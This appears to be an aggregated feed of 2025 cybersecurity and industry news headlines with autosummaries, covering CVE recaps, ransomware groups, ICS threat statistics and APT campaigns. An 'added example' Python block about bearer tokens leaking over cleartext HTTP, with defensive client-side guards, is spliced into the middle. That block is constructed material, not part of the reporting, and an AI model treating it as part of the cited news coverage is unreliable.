    Claim follows Mr Musk's own lawsuit earlier this year against OpenAI's Sam Altman. "

    Autosummary: In February, Mr Musk made an unsolicited bid for OpenAI, offering to buy it for $97.4 billion, which Mr Altman rejected by posting: "no thank you but we will buy twitter for $9.74 billion if you want." "


    Security Theater: Vanity Metrics Keep You Busy - and Exposed

    industry
    2025-04-07 https://thehackernews.com/2025/04/security-theater-vanity-metrics-keep.html
    After more than 25 years of mitigating risks, ensuring compliance, and building robust security programs for Fortune 500 companies, I’ve learned that looking busy isn’t the same as being secure.  It’s an easy trap for busy cybersecurity leaders to fall into. We rely on metrics that tell a story of the tremendous efforts we’re expending - how many vulnerabilities we patched, how fast we "

    Autosummary: We rely on metrics that tell a story of the tremendous efforts we're expending - how many vulnerabilities we patched, how fast we responded - but often vulnerability management metrics get associated with operational metrics because traditional approaches to measuring and implementing vulnerability management do not actually reduce risk. Attackers chain together exposures - misconfigurations, overprivileged identities, unpatched CVEs - to reach high-value targets. Whether it's credential misuse, missing patches, open ports, or cloud misconfigurations, this breakdown informs both tactical response and strategic planning. Taken together and continuously updated, meaningful metrics give you more than a snapshot - they provide a living, contextual view of your threat exposure. They typically fall into three main types: Volume metrics – These count things: patches applied, vulnerabilities discovered, scans completed. "


    A revolution is underway in India's trainer industry

    industry
    2025-04-07 https://www.bbc.com/news/articles/cm2nplgm2kpo
    India wants to boost the domestic trainer industry but will small domestic makers suffer? "

    Autosummary: "Most homegrown brands rely on off-the-shelf soles from the market, but when we started Comet, we realized that these were lacking in quality, durability, and grip," he says. Sabhib Agrawal is trying to get those buyers interested in barefoot footwear - shoes which, their makers say, are healthy for the foot as they encourage natural, or barefoot, movement. "Many consumers, especially in rural and lower-income urban areas, opt for cheaper local footwear instead of branded options," he says. "


    AI Threats Are Evolving Fast — Learn Practical Defense Tactics in this Expert Webinar

    industry
    2025-04-03 https://thehackernews.com/2025/04/ai-threats-are-evolving-fast-learn.html
    The rules have changed. Again. Artificial intelligence is bringing powerful new tools to businesses. But it's also giving cybercriminals smarter ways to attack. They’re moving quicker, targeting more precisely, and slipping past old defenses without being noticed. And here's the harsh truth: If your security strategy hasn’t evolved with AI in mind, you’re already behind. But you’re not alone—and "

    Autosummary: What You'll Learn: How attackers are using AI—and how you can think like them; The latest threat trends you might not know about yet; Easy-to-follow strategies for securing AI use in your company; Why Zero Trust is key to staying safe; A practical approach to building long-term cyber resilience. Cyber threats won't wait. "


    ⚡ Weekly Recap: Chrome 0-Day, IngressNightmare, Solar Bugs, DNS Tactics, and More

    exploits industry
    2025-03-31 https://thehackernews.com/2025/03/weekly-recap-chrome-0-day.html
    Every week, someone somewhere slips up—and threat actors slip in. A misconfigured setting, an overlooked vulnerability, or a too-convenient cloud tool becomes the perfect entry point. But what happens when the hunters become the hunted? Or when old malware resurfaces with new tricks? Step behind the curtain with us this week as we explore breaches born from routine oversights—and the unexpected "

    Autosummary: This week's list includes — CVE-2025-2783, CVE-2025-2476 (Google Chrome), CVE-2025-2857 (Mozilla Firefox, Tor Browser), CVE-2025-1974 (Kubernetes NGINX Ingress Controller), CVE-2025-26512 (NetApp SnapCenter), CVE-2025-22230 (VMware Tools for Windows), CVE-2025-2825 (CrushFTP), CVE-2025-20229 (Splunk), CVE-2025-30232 (Exim), CVE-2025-1716, CVE-2025-1889, CVE-2025-1944, CVE-2025-1945 (picklescan), and CVE-2025-2294 (Kubio AI Page Builder plugin). Previously, the duo revealed multiple vulnerabilities in Phoenix Contact CHARX SEC-3100, an electric vehicle (EV) charger controller, that could facilitate privilege escalation and remote code execution (CVE-2024-6788, CVE-2024-25994, CVE-2024-25995, and CVE-2024-25999). This malware harvests sensitive data such as system metadata, files matching certain extensions, running processes, installed software, and user credentials, as well as information from cryptocurrency wallets, messaging applications, and web browsers. 46 Flaws in Solar Inverters From Sungrow, Growatt, and SMA — As many as 46 security bugs have been discovered in products from three solar inverter vendors, Sungrow, Growatt, and SMA, that, if successfully exploited, could permit attackers to seize control of devices and cause potential power blackouts. With support for multiple scanning modes, advanced discovery techniques, and customizable payloads, Dalfox offers deep insights into reflected, stored, and DOM-based XSS vulnerabilities—all while providing detailed, developer-friendly output. Exploiting Car Infotainment System to Plant Spyware — NCC Group researchers Alex Plaskett and McCaulay Hudson have demonstrated a trio of zero-day exploits (CVE-2024-23928, CVE-2024-23929, and CVE-2024-23930) that could be weaponized to break into Pioneer DMH-WT7600NEX, gain shell access, and install malicious software on the in-vehicle infotainment (IVI) system. The vulnerabilities, collectively named SUN:DOWN, "can be exploited to execute arbitrary commands on devices or the vendor's cloud, take over accounts, gain a foothold in the vendor's infrastructure, or take control of inverter owners' devices." "These online forums or communities [...] see offenders collaborate or compete to cause harm across a broad spectrum of criminality – both on and offline – including cyber, fraud, extremism, serious violence, and child sexual abuse," the NCA said. Meta has announced that its AI-powered virtual assistant, Meta AI, is finally launching across Facebook, Instagram, WhatsApp, and Messenger in the European Union and United Kingdom over the coming weeks. Also called OrpaCrab, the sophisticated Linux-based backdoor is capable of surveillance, lateral movement, data exfiltration, system manipulation, and remote control. "


    New Morphing Meerkat Phishing Kit Mimics 114 Brands Using Victims’ DNS Email Records

    financial industry
    2025-03-27 https://thehackernews.com/2025/03/new-morphing-meerkat-phishing-kit.html
    Cybersecurity researchers have shed light on a new phishing-as-a-service (PhaaS) platform that leverages the Domain Name System (DNS) mail exchange (MX) records to serve fake login pages that impersonate about 114 brands. DNS intelligence firm Infoblox is tracking the actor behind the PhaaS, the phishing kit, and the related activity under the moniker Morphing Meerkat. "The threat actor behind "

    Autosummary: "


    DeRISK Quantified Vulnerability Management evaluates cyber risks using business-level metrics

    exploits industry
    2025-03-26 https://www.helpnetsecurity.com/2025/03/26/derisk-quantified-vulnerability-management/

    DeNexus announced an innovative enhancement to its cyber risk management flagship solution DeRISK. The new DeRISK Quantified Vulnerability Management leverages advanced AI techniques to automatically and continuously map common vulnerabilities and exposures, or CVEs, to potential financial impacts, providing insights for cybersecurity teams. This new solution will revolutionize vulnerability management in OT environments by addressing the overwhelming challenge of prioritizing CVEs, reducing the task to only those that drive financial exposure, and transforming how organizations … More

    "

    Autosummary: “In addition to layering in exploit metrics like EPSS and KEV, we must understand the context and exposure of identified vulnerabilities—using DeRISK’s wealth of outside-in and inside-out data, we can now prioritize remediation at scale, while also having financial data to support risk-acceptance decisions.” "


    APT and financial attacks on industrial organizations in Q4 2024

    financial industry
    2025-03-25 https://ics-cert.kaspersky.com/publications/apt-and-financial-attacks-on-industrial-organizations-in-q4-2024/
    Abuse of Telegram to spy on and put pressure on their victims’ employees, notifying the victims by printing messages on printers connected to a compromised network – we publish interesting details of attacks on industrial enterprises disclosed this quarter. "

    Autosummary: According to Trend Micro, Salt Typhoon targeted telecom, government, technology, consulting, chemical and transportation companies in Afghanistan, Brazil, Eswatini, India, Indonesia, Malaysia, Pakistan, the Philippines, South Africa, Taiwan, Thailand, U.S. and Vietnam. Middle East-related activity: CISA alert on Iranian cyber actors. The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Communications Security Establishment Canada (CSE), Australian Federal Police (AFP) and Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) released a joint cybersecurity advisory regarding Iranian cyber actors that have been actively targeting organizations across various critical infrastructure sectors, including healthcare, public health, government, IT, engineering and energy, since October 2023. In total, eight modules were discovered, with targets from Bangladesh, Djibouti, Jordan, Malaysia, the Maldives, Myanmar, Nepal, Pakistan, Saudi Arabia, Sri Lanka, Turkey and the United Arab Emirates. Interlock ransomware samples have been spotted in India, Italy, Japan, Germany, Peru, South Korea, Turkey and the U.S., and victims have been found in the education, finance, government, healthcare, and manufacturing sectors. Additionally, the attackers exploited the following vulnerabilities: Atlassian Confluence RCE vulnerabilities (CVE-2023-22515, CVE-2023-22518), Zimbra vulnerability chain (CVE-2019-9670, CVE-2019-9621), MS Exchange vulnerability chain (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) and JetBrains TeamCity RCE vulnerability (CVE-2024-27198).
Attacks by Akira/Howling Scorpius targeting medium-size organizations in various sectors, including construction, transportation and logistics, government, telecommunications, technology and pharmaceuticals, bypassed cybersecurity solutions through a mix of well-known techniques, such as Bring Your Own Vulnerable Driver, and a new one targeting virtualized infrastructures protected with EDR solutions. The new Interlock ransomware, which has a version tailored for this OS, has been observed targeting industrial enterprises in India, Italy, Japan, Germany, Peru, South Korea, Turkey, and the United States. Initial access is achieved by exploiting vulnerable public endpoints using CVE-2023-46805, CVE-2024-21887 (Ivanti Connect VPN service), CVE-2023-48788 (FortiClient EMS), CVE-2022-3236 (Sophos firewall), CVE-2021-26855, CVE-2021-26857-6858 and CVE-2021-27065 (ProxyLogon). The attacks associated with all four group names (Shadow, Twelve, Comet, DARKSTAR) involved use of the same tools, like Cobint, gpo.ps1, similar strings in Windows tasks created for running malware, and ngrok as one of the backup channels for the access and execution of other malicious actions. Operation Cobalt Whisper: SEQRITE Labs’ APT team has revealed an advanced cyber-espionage campaign known as Operation Cobalt Whisper, impacting multiple industries including defense, education, environmental engineering, electrotechnical engineering, energy, cybersecurity, aviation and healthcare in Hong Kong and Pakistan. In addition to GHOSTSPIDER, Salt Typhoon uses a set of proprietary and shared tools for complex multi-stage attacks: SNAPPYBEE (aka Deed RAT), SparrowDoor, CrowDoor and MASOL RAT for Linux, the DEMODEX rootkit, NeoReGeorg, frpc, and Cobalt Strike. According to Kaspersky telemetry, the threat actor has been active in Russia, Belarus, Kazakhstan, Kyrgyzstan, Moldova, Slovakia, and Turkey.
When targeting defence, energy, governmental, pharmaceutical, insurance and legal sectors in Europe, Ukraine and the U.S. for espionage and cybercrime, RomCom exploited a chain of two zero-day vulnerabilities (one in the browser and one in the OS) that ended up with zero-click remote code execution. Affected industries include education, construction, consulting, transportation and logistics, government, telecommunications, technology and pharmaceuticals, with manufacturing being affected the most. RomCom attacks: ESET researchers have linked Russia-aligned threat actor RomCom (aka Storm-0978, Tropical Scorpius, UNC2596), known for its opportunistic and targeted espionage operations, to a campaign exploiting two zero-day vulnerabilities: one in Mozilla Firefox (CVE-2024-9680) and the other in Microsoft Windows (CVE-2024-49039). The malware supports several plugins that can steal login and FTP credentials, email addresses, cookies, and other information from browsers, Outlook, Thunderbird, FileZilla and WinSCP. The Crypt Ghouls’ other toolset consists of common tools such as Mimikatz, XenAllPasswordPro, PingCastle, Localtonet tool, Resocks, AnyDesk, PsExec and others. "


    Q4 2024 – a brief overview of the main incidents in industrial cybersecurity

    industry ciber
    2025-03-25 https://ics-cert.kaspersky.com/publications/q4-2024-a-brief-overview-of-the-main-incidents-in-industrial-cybersecurity/
    In Q4 2024, 107 incidents were publicly confirmed by victims. All of these incidents are included in the table at the end of the overview, with select incidents described in detail. Report at a glance Attacks leading to insolvency Kreisel Manufacturing | Denial of operations, insolvency | Ransomware German bulk material handling company Kreisel GmbH & […] "

    Autosummary: Stoli Group Manufacturing, food and beverage | Denial of operations, denial of IT services, data leakage, bankruptcy | Ransomware Stoli Group USA and Kentucky Owl, U.S.-based subsidiaries of the Luxembourg-based vodka manufacturer Stoli Group, filed for Chapter 11 bankruptcy on November 29, months after a ransomware attack disrupted their operations. Medion Manufacturing, electronics | Denial of operations, denial of IT systems, data leakage | Ransomware German electronic products supplier Medion AG, a subsidiary of Lenovo, a Chinese multinational technology company, became the target of a cyberattack. Countries with the highest number of reported incidents: USA: 81% (87 incidents); Germany: 6% (7 incidents); Japan: 4% (4 incidents). This quarter, we saw incidents in certain countries where we rarely see public confirmation of incidents: Costa Rica, Luxembourg, Latvia, Burkina Faso, and Pakistan. Other major incidents of interest: Microlise Transportation, logistics | Denial of IT systems, denial of services | Ransomware Microlise, a British telematics and fleet management solution provider, was affected by the cyberattack known to have disrupted DHL’s store deliveries for the retailer NISA. Biggest impact prevented by responders: TetraSoft Energy, mining | Denial of operations and services, supply chain / trusted partner A targeted cyberattack on TetraSoft, a Russian company that provides remote monitoring of hydrocarbon production and drilling, was detected and stopped. According to the company, the threat actors stole a total of 50,694 files from NPCV, including internal documents related to green procurement, health and safety, policies, and transactions, as well as emails from business partners. According to Financial Times, Serco, which handles the transport of prisoners for the Ministry of Justice, has seen vehicle tracking, panic alarms, navigation, and notifications related to estimated arrival times disabled.
Incidents at large organizations Schneider Electric Energy, manufacturing | Personal data leakage | Ransomware On November 4, French energy management and automation solutions company Schneider Electric confirmed a cyberattack involving unauthorized access to one of its internal project execution tracking platforms hosted in an isolated environment following claims by the Grep (Hellcat) group of an incident involving the theft of 40 GB and a ransom demand. "


    ⚡ THN Weekly Recap: GitHub Supply Chain Attack, AI Malware, BYOVD Tactics, and More

    exploits industry
    2025-03-24 https://thehackernews.com/2025/03/thn-weekly-recap-github-supply-chain.html
    A quiet tweak in a popular open-source tool opened the door to a supply chain breach—what started as a targeted attack quickly spiraled, exposing secrets across countless projects. That wasn’t the only stealth move. A new all-in-one malware is silently stealing passwords, crypto, and control—while hiding in plain sight. And over 300 Android apps joined the chaos, running ad "

    Autosummary: This week's list includes — CVE-2025-29927 (Next.js), CVE-2025-23120 (Veeam Backup & Replication), CVE-2024-56346, CVE-2024-56347 (IBM Advanced Interactive eXecutive), CVE-2024-10441 (Synology BeeStation Manager, DiskStation Manager, and Unified Controller), CVE-2025-26909 (WP Ghost), CVE-2023-43650, CVE-2023-43651, CVE-2023-43652, CVE-2023-42818, CVE-2023-46123, CVE-2024-29201, CVE-2024-29202, CVE-2024-40628, CVE-2024-40629 (JumpServer), and CVE-2025-0927 (Linux kernel). 📰 Around the Cyber World: Google Releases OSV-Scanner 2 — Google has announced the release of an updated iteration of OSV-Scanner, its free vulnerability scanner for open-source developers. Aquatic Panda Attributed to 2022 Espionage Campaign — The China-aligned Aquatic Panda has been linked to a "global espionage campaign" that took place in 2022 targeting seven organizations in Taiwan, Hungary, Turkey, Thailand, France, and the United States. "Connections made over cleartext HTTP ports risk exposing sensitive information because the data is transmitted unencrypted and can be intercepted by network intermediaries, such as ISPs, Wi-Fi hotspot providers, or malicious actors on the same network," it noted. "However, by the time this occurs, it may be too late, because sensitive information, such as an API token, may have already been transmitted in cleartext in the initial client request." Furthermore, third parties on shared networks could intercept sensitive data from the plaintext HTTP request, or even carry out a Monster-in-the-Middle (MITM) attack by impersonating the web server. T-Pot is a powerful, all-in-one honeypot platform that bundles 20+ honeypots with built-in dashboards, live attack maps, and threat analysis tools—no commercial license needed. With built-in subdomain discovery, traffic monitoring, and flexible CLI options, it's a powerful free tool for security researchers and red teamers looking to automate smarter, context-aware testing. "During the attack, the threat actor showed a sophisticated ability to overcome security challenges across multiple domains, including macOS malwares, AWS cloud compromise, application security and smart contract security." To that end, organizations are expected to identify cryptographic services needing upgrades and build a migration plan by 2028, execute high-priority upgrades and refine plans as PQC evolves from 2028 to 2031, and complete migration to PQC for all systems, services and products from 2031 to 2035. "The U.K.'s demand of Apple raises a number of serious concerns which directly impact national security and therefore warrant robust public debate," according to a joint letter published by Senators Ron Wyden and Alex Padilla, along with Representatives Andy Biggs, Warren Davidson, and Zoe Lofgren. Unlike traditional scanners, Rogue analyzes each target in real-time, adapting its tests based on responses and generating detailed, easy-to-read reports. Identifying ransomware, data theft, and disinformation as the most acute hybrid cybercrime threats, the European police organization said that criminal groups are using cryptocurrency to launder money and move funds around, making their activities harder to detect. "
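The cleartext-HTTP point quoted in the recap is easy to state and easy to get wrong in client code: a server-side redirect from http to https fires only after the client's first request, and that first request already carried the Authorization header. The Python below is an added example, not code from The Hacker News or from any vendor quoted above; the hostname api.example.test, the token value and the helper names are constructed for illustration. It serializes the first request a naive client would emit (the bytes an on-path observer sees), then shows the client-side guard that refuses to attach credentials to a non-https URL before anything is sent, and that strips them again if a redirect downgrades the scheme or moves to another host. No network is used.

```python
"""Why an HTTP->HTTPS redirect on the server does not protect an API token.

Added example; hostnames, token and helper names are constructed for
illustration and are not from the article or any vendor's client library.
The "wire" here is the raw request bytes a client would emit.
"""
from urllib.parse import urlsplit

# Constructed sample bearer token; not a real credential.
SAMPLE_TOKEN = "tok_9f3c1a2b7d4e"


def build_raw_request(url: str, token: str) -> bytes:
    """Serialize the first request a naive client sends for `url`.

    When the scheme is plain http this byte string is exactly what an
    on-path observer (ISP, hotspot, same-LAN attacker) captures: the
    Authorization header is in it before any redirect can arrive.
    """
    parts = urlsplit(url)
    path = parts.path or "/"
    if parts.query:
        path += "?" + parts.query
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {parts.netloc}",
        f"Authorization: Bearer {token}",
        "",
        "",
    ]
    return "\r\n".join(lines).encode()


def token_visible_on_wire(url: str, token: str) -> bool:
    """True if a passive observer of the plaintext request could read `token`.

    Over https the request bytes are inside TLS and the observer sees
    none of them; over http the raw request is the wire format.
    """
    if urlsplit(url).scheme.lower() == "https":
        return False
    return token.encode() in build_raw_request(url, token)


class InsecureSchemeError(ValueError):
    """Raised before any bytes leave the client, not after a redirect."""


def authorized_headers(url: str, token: str) -> dict:
    """Client-side guard: only attach credentials to https URLs.

    The check runs before the request is built, which is the only point
    at which refusing still helps; a 301 from the server arrives after
    the token has already crossed the network.
    """
    if urlsplit(url).scheme.lower() != "https":
        raise InsecureSchemeError(f"refusing to send credentials over {url}")
    return {"Authorization": f"Bearer {token}"}


def headers_for_redirect(original_url: str, redirect_url: str,
                         headers: dict) -> dict:
    """Drop Authorization when a redirect downgrades the scheme or changes host.

    Credentials bound to https://api.example.test must not be replayed to
    http://api.example.test, nor to whatever other host a 3xx names.
    """
    orig, dest = urlsplit(original_url), urlsplit(redirect_url)
    downgraded = orig.scheme.lower() == "https" and dest.scheme.lower() != "https"
    host_changed = orig.hostname != dest.hostname
    if downgraded or host_changed:
        return {k: v for k, v in headers.items() if k.lower() != "authorization"}
    return dict(headers)


if __name__ == "__main__":
    leaky = "http://api.example.test/v1/zones"  # constructed hostname
    print(build_raw_request(leaky, SAMPLE_TOKEN).decode())
    print("token readable by observer:", token_visible_on_wire(leaky, SAMPLE_TOKEN))
    try:
        authorized_headers(leaky, SAMPLE_TOKEN)
    except InsecureSchemeError as err:
        print("hardened client:", err)
```

The practical rule this encodes: pin API base URLs to https in configuration and check the scheme before building the request. A client that relies on the server's redirect is in exactly the failure mode the quoted text describes, because the token has already been sent by the time the redirect is received.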


    VanHelsing RaaS Launch: 3 Victims, $5K Entry Fee, Multi-OS, and Double Extortion Tactics

    industry
    2025-03-24 https://thehackernews.com/2025/03/vanhelsing-raas-launch-3-victims-5k.html
    A ransomware-as-a-service (RaaS) operation called VanHelsing has already claimed three victims since it launched on March 7, 2025. "The RaaS model allows a wide range of participants, from experienced hackers to newcomers, to get involved with a $5,000 deposit. Affiliates keep 80% of the ransom payments, while the core operators earn 20%," Check Point said in a report published over the weekend "

    Autosummary: The emergence of VanHelsing coincides with a number of developments in the ever-evolving ransomware landscape:
    - The discovery of new versions of Albabat ransomware that go beyond Windows to Linux and macOS, gathering system and hardware information
    - BlackLock ransomware, a rebranded version of Eldorado, has become one of the most active RaaS groups in 2025, targeting technology, manufacturing, construction, finance, and retail sectors
    - BlackLock is actively recruiting traffers to drive early stages of ransomware attacks, directing victims to malicious pages that deploy malware capable of establishing initial access to compromised systems
    - The JavaScript-based malware framework known as SocGholish (aka FakeUpdates) is being used to deliver RansomHub ransomware, an activity attributed to a threat cluster dubbed Water Scylla
    - The exploitation of security flaws in Fortinet firewall appliances (CVE-2024-55591 and CVE-2025-24472) by a threat actor dubbed Mora_001 since late January 2025 to deliver a newly discovered ransomware strain codenamed SuperBlack, a modified version of LockBit 3.0 that utilizes a custom data exfiltration tool
    - The Babuk2 (aka Babuk-Bjorka) ransomware group has been observed reusing data from earlier breaches associated with RansomHub, FunkSec, LockBit, and Babuk to issue fake extortion demands to victims
    According to statistics compiled by Bitdefender, February 2025 was the worst month for ransomware in history, hitting a record 962 victims, up from 425 victims in February 2024. "


    Whistleblower reveals oil giant's "awful" pollution

    industry
    2025-03-20 https://www.bbc.com/news/articles/crewlj11jljo
    Colombia’s Ecopetrol polluted hundreds of sites, including water sources and wetlands, the BBC finds. "

    Autosummary: The BBC saw a black, oily-looking substance and containment barriers at one of the sites listed in the database as "only known to Ecopetrol". Ecopetrol's CEO from 2017 to 2023, Felipe Bayón, told the BBC he strongly denied suggestions that there was any policy to withhold information about pollution. Pointing to it, Yuly Velásquez, president of Fedepesan, a federation of fishing organisations in the region, said: "This is all grease and waste that comes directly from the Ecopetrol refinery." "We found turtles, capybaras, birds, thousands of dead fish," she said last June. Mr Olarte says he realised "something was wrong" soon after joining Ecopetrol. Andrés Olarte, the whistleblower who has shared the company's data, says pollution by the firm dates back many years. "There is always that risk of some sort of contagion between the private security companies, the types of people they employ, and their desire to continually maintain their contract," Mr Smith says. "


    CERT-UA warns of cyber espionage against the Ukrainian defense industry using Dark Crystal RAT

    industry
    2025-03-20 https://securityaffairs.com/175642/hacking/cert-ua-warns-ukrainian-defense-industry-dark-crystal-rat.html
    CERT-UA warns of a cyber campaign using Dark Crystal RAT to target Ukraine’s defense sector, including defense industry employees and Defense Forces members. The Computer Emergency Response Team of Ukraine (CERT-UA) uncovered a new cyber espionage campaign targeting employees of defense-industrial complex enterprises and representatives of the Defense Forces of Ukraine with Dark Crystal RAT. […] "

    Autosummary: The DCRat consists of three components: a stealer/client executable; a single PHP page, serving as the command-and-control (C2) endpoint/interface; and an administrator tool. In June 2022, the Governmental Computer Emergency Response Team of Ukraine (CERT-UA) warned of another malware campaign targeting Ukrainian telecommunications operators with the DarkCrystal RAT. "


    Outseer introduces Behavioral Biometrics capability

    industry
    2025-03-19 https://www.helpnetsecurity.com/2025/03/19/outseer-behavioral-biometrics-capability/

    Outseer announced its platform-native Behavioral Biometrics capability. The addition of platformized Behavioral Biometrics introduces another layer of defense that continuously analyzes user interactions to detect anomalies in real time. Building on its RSA heritage (formerly RSA Fraud & Risk Intelligence), Outseer has enhanced its platform to counter modern cyber threats. As fraud evolves, spurred by the digitization of payments, the spread of personal data across the dark web, the growing threat of scams and … More
    The post Outseer introduces Behavioral Biometrics capability appeared first on Help Net Security. "

    Autosummary: "


    Critical mySCADA myPRO Flaws Could Let Attackers Take Over Industrial Control Systems

    industry
    2025-03-19 https://thehackernews.com/2025/03/critical-myscada-mypro-flaws-could-let.html
    Cybersecurity researchers have disclosed details of two critical flaws impacting mySCADA myPRO, a Supervisory Control and Data Acquisition (SCADA) system used in operational technology (OT) environments, that could allow malicious actors to take control of susceptible systems. "These vulnerabilities, if exploited, could grant unauthorized access to industrial control networks, potentially "

    Autosummary: "


    Borked Chromecasts are beginning to receive their update – just hope you didn’t do a factory reset

    industry
    2025-03-17 https://www.bitdefender.com/en-us/blog/hotforsecurity/borked-chromecasts-are-beginning-to-receive-their-update-just-hope-you-didnt-do-a-factory-reset
    The news can't have come too soon for the many Chromecast users who have found themselves unable to stream their favourite TV shows, movies, and other media. Read more in my article on the Hot for Security blog. "

    Autosummary: "


    Threat landscape for industrial automation systems. Regions, Q4 2024

    industry
    2025-03-17 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-regions-q4-2024/
    The percentage of ICS computers on which malicious objects were blocked increased in eight regions. Regionally, the percentage ranged from 10.6% in Northern Europe to 31.0% in Africa. "

    Autosummary: This group includes Windows computers that serve one or several of the following purposes: Supervisory control and data acquisition (SCADA) servers; building automation servers; data storage (Historian) servers; data gateways (OPC); stationary workstations of engineers and operators; mobile workstations of engineers and operators; human machine interface (HMI); computers used to manage technological and building automation networks; computers of ICS/PLC programmers. Computers that share statistics with us belong to organizations from various industries.
    All regions ranked by percentage of ICS computers on which malicious objects were blocked in the fourth quarter can be divided into three groups. Over 25%: Africa – 31.0%; South-East Asia – 30.1%; Middle East – 25.7%. In the regions within this group, OT computers are generally overexposed to cyberthreats.
    Spyware: in almost all regions, spyware does not rank higher than third in the threat category rankings by percentage of ICS computers on which it was blocked, except in East Asia, where spyware is the number one malware category by that measure.
    Malware for AutoCAD: in Q4 2024, this category ranked higher than the corresponding global ranking (ninth place) in South-East Asia (fifth place in the regional ranking) and East Asia (seventh place in the regional ranking). The only three regions with growth in the percentage of ICS computers on which malware for AutoCAD was blocked were South-East Asia, South Asia, and Central Asia.
    Threat sources, regional highlights: In Q4 2024, East Asia ranked first again among the regions by percentage of ICS computers on which malicious threats from network folders were blocked, surpassing the global average by 3.4 times (exceeding Q3 2024 levels); another region ranked second in the world by the same measure, exceeding the global average by 2.9 times (surpassing Q3 2024 levels). Southern Europe again ranked first globally in the percentage of ICS computers where malicious threats from email clients were blocked, exceeding the global average by 2.4 times; another region ranked third in the world by the same measure, exceeding the global average by 1.7 times. South Asia ranks third globally by percentage of ICS computers on which malicious threats from removable devices were blocked, surpassing the global average by 1.8 times; in another region the percentage of ICS computers on which threats from removable devices were blocked exceeded the global average by 1.3 times.
    Quarterly changes and trends, largest proportional increases in Q4 2024 by region (region names are missing from the extract): spyware by 1.3 times (ranked second globally in terms of growth); malicious scripts and phishing pages by 1.3 times (first in the world in terms of growth); web miners by 1.3 times (third globally in terms of growth); malicious scripts and phishing pages by 1.2 times; spyware by 1.2 times; malware for AutoCAD by 1.3 times; ransomware by 1.3 times.
    Comparative analysis, threat categories versus global figures by region (region names are missing from the extract): malicious documents 2.2 times higher (surpassing Q3 2024 levels), ranked first by value among the regions; malicious documents 1.9 times higher, ranked second by value among the regions; malicious documents 1.2 times higher (surpassing Q3 2024 levels); miners in the form of executable files for Windows 1.5 times higher (surpassing Q3 2024 levels), ranked second by value globally; miners in the form of executable files for Windows 2.1 times higher, ranked first by value globally; malware for AutoCAD 3.8 times higher, ranked second by value globally.
    Covert cryptomining programs: the three leading regions by percentage of ICS computers on which web miners running in browsers were blocked were the Middle East, Africa, and Eastern Europe. In the fourth quarter of 2024, similar to the previous quarter, a significant portion of Windows miners found on ICS computers consisted of archives with names mimicking legitimate software.
    Malicious documents: Southern Europe, Latin America, and the Middle East ranked as the top three regions by the percentage of ICS computers on which malicious documents were blocked.
    Malicious scripts and phishing pages: the top three regions by percentage of ICS computers on which malicious scripts and phishing pages were blocked were Africa, Southern Europe, and Latin America; the top three regions in terms of growth were Africa, Southern Europe, and the Middle East.
    Denylisted internet resources: Africa, South-East Asia, and Central Asia ranked as the top three regions by the percentage of ICS computers on which denylisted internet resources were blocked.
    Next-stage malware: malicious objects used to initially infect computers deliver next-stage malware – spyware, ransomware, and miners – to victims' computers.
    Ransomware: the top three regions with the highest percentage of ICS computers on which ransomware was blocked were the Middle East, Africa, and South Asia.
    Viruses: the top three regions by percentage of ICS computers on which viruses were blocked remained South-East Asia, Africa, and East Asia.
    Figures in the source: Regions ranked by percentage of ICS computers on which malicious objects / spyware / threats from email clients / malicious scripts and phishing pages were blocked, Q4 2024; Changes in the percentage of ICS computers on which miners in the form of executable files for Windows / web miners / malicious scripts and phishing pages / denylisted internet resources / malicious documents / spyware / worms were blocked, Q4 2024. "


    Threat landscape for industrial automation systems. Q4 2024

    industry
    2025-03-17 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-q4-2024/
    The percentage of ICS computers on which malicious scripts and phishing pages as well as ransomware were blocked continued to increase. "

    Autosummary: This group includes Windows computers that serve one or several of the following purposes: Supervisory control and data acquisition (SCADA) servers; building automation servers; data storage (Historian) servers; data gateways (OPC); stationary workstations of engineers and operators; mobile workstations of engineers and operators; human machine interface (HMI); computers used to manage technological and building automation networks; computers of ICS/PLC programmers. Computers that share statistics with us belong to organizations from various industries. The most common are the chemical industry, metallurgy, ICS design and integration, oil and gas, energy, transport and logistics, food industry, light industry, pharmaceuticals.
    Q4 in numbers:
    Parameter | Q3 2024 | Q4 2024 | Quarterly change
    Global percentage of attacked ICS computers | 22.0% | 21.9% | ▼0.1 pp
    Percentage of ICS computers on which malicious objects from different categories were blocked:
    Malicious scripts and phishing pages (JS and HTML) | 6.24% | 7.11% | ▲0.87 pp
    Denylisted internet resources | 6.84% | 5.52% | ▼1.32 pp
    Spy Trojans, backdoors and keyloggers | 3.91% | 4.30% | ▲0.39 pp
    Main threat sources:
    Internet | 10.84% | 9.98% | ▼0.86 pp
    Email clients | 2.95% | 2.72% | ▼0.23 pp
    Removable media | 0.69% | 0.64% | ▼0.05 pp
    Network folders | 0.11% | 0.08% | ▼0.03 pp
    Statistics across all threats: In the fourth quarter of 2024, the percentage of ICS computers on which malicious objects were blocked decreased by 0.1 pp from the previous quarter to 21.9%. Compared to the fourth quarter of 2023, the percentage decreased by 2.5 pp. Regionally, the percentage of ICS computers that blocked malicious objects during the quarter ranged from 10.6% in Northern Europe to 31% in Africa.
    Diversity of detected malicious objects: malicious objects of various categories, which Kaspersky products block on ICS computers, can be divided into three groups according to their distribution method and purpose.
    Figures in the source: Percentage of ICS computers on which malicious objects were blocked, Jan 2023-Dec 2024; Percentage of ICS computers on which malicious objects were blocked, by quarter, 2022-2024; Percentage of ICS computers on which malicious objects were blocked in selected industries. "


    Cybersecurity classics: 10 books that shaped the industry

    industry ciber
    2025-03-13 https://www.helpnetsecurity.com/2025/03/13/cybersecurity-classics-books/

    Cybersecurity constantly evolves, but some books have stood the test of time, shaping how professionals think about security, risk, and digital threats. Whether you're a CISO, a seasoned expert, or a cybersecurity enthusiast, these must-reads belong on your shelf. Masters of Deception: The Gang That Ruled Cyberspace. Author: Michele Slatalla. Set against the backdrop of the 1990 AT&T phone network crash, Masters of Deception chronicles an important moment in hacker history: law enforcement cracked down on … More "

